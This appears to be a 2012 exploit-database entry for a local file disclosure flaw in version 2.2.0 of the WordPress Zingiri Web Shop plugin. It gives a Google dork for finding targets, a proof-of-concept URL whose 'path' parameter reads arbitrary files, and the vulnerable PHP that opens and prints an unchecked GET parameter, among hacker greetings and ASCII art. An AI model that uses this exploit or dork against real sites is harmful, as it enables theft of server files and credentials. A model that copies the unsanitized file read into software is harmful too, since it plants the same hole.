wordpress zingiri web shop plugin local file disclusure LFD



EKU-ID: 1885 CVE: OSVDB-ID:
Author: Tunisian spl01t3r Published: 2012-04-10 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


+----------------------------------------------------------------------+
# Exploit Title: wordpress zingiri web shop plugin local file disclusure LFD
# Google Dork: inurl:wp-content/plugins/zingiri-web-shop
# Date: 08/04/2012
# Author: Tunisian spl01t3r
# Greetz: Milw0rm 1337day.com
# Software Link: http://wordpress.org/extend/plugins/zingiri-web-shop/download/
# version zingiri-web-shop.2.2.0

____ (_) ____   ___
(  _ \| |(  _ \ / _ \
| | | | || | | x |_|
| ||_/|_|| ||_/ \___/
|_|      |_|
_
(_)  ____   ____  ____     _____
| | /  __| /  __| \__ \   /  `  \
| | \___ \ \___ \  / _ \_ | Y Y  \
|_| |____/ |____/ (___  / |_|_|  /
  \/       \/                         
+----------------------------------------------------------------------+
[+] p0c : http://[SERVER]/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax-preview.php?path= [lfd]

[+] vulnerable code : 
if(($fp = @fopen($_GET['path'], 'r'))) {
echo fread($fp, @filesize($_GET['path']));
@fclose($fp);
+----------------------------------------------------------------------+
[+] greetz to : BIbou sfaxien ; mech lazem ;tn_scorpion ; anas laaribi ;
       jendoubi ahmed ; s-man ; chaouki mkachakh & ;) --Geni ryodan-- ;)
  
                      mAhna mAhna
  
[+] profile :  www.facebook.com/TN.spl0it3r   

+----------------------------------------------------------------------+